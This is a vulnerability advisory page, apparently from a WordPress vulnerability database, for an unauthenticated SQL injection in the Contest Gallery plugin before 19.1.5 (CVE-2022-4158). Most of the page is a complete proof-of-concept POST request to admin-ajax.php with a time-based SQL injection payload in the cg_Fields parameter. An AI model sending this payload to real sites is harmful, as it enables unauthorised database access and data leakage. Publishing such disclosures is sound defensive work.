Lucene search
Daniel KrohmerWPEX-ID:1B3B51AF-AD73-4F8E-BA97-375B8A363B64HistoryDec 05, 2022 - 12:00 a.m.
Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
2022-12-0500:00:00
Daniel Krohmer
76
sql injection
form data
security breach
unauthenticated access
http request
EPSS
0.002
Percentile
60.0%
The plugins do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site’s database.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
Content-Length: 3796
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/?p=1
Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_current_page_id"
1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_check"
63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="action"
post_cg_registry
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_gallery_id_registry"
1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"
1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"
user-check-agreement-field
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"
1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"
testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"
2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"
main-nick-name
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"
1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"
testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"
3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"
main-mail
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"
2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"
[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"
4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"
password
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"
3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"
testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"
5
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"
password-confirm
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"
4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"
testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-mail"
[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-user-name"
testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-nick-name"
testing
-----------------------------22204028416237992052154109961--
Related
cvelist
cvelist
CVE-2022-4158 Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
2022-12-26 12:28:02
wpvulndb
wpvulndb
Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
2022-12-05 00:00:00
nvd
nvd
CVE-2022-4158
2022-12-26 13:15:13
cve
cve
CVE-2022-4158
2022-12-26 13:15:13
prion
prion
Cross site request forgery (csrf)
2022-12-26 13:15:00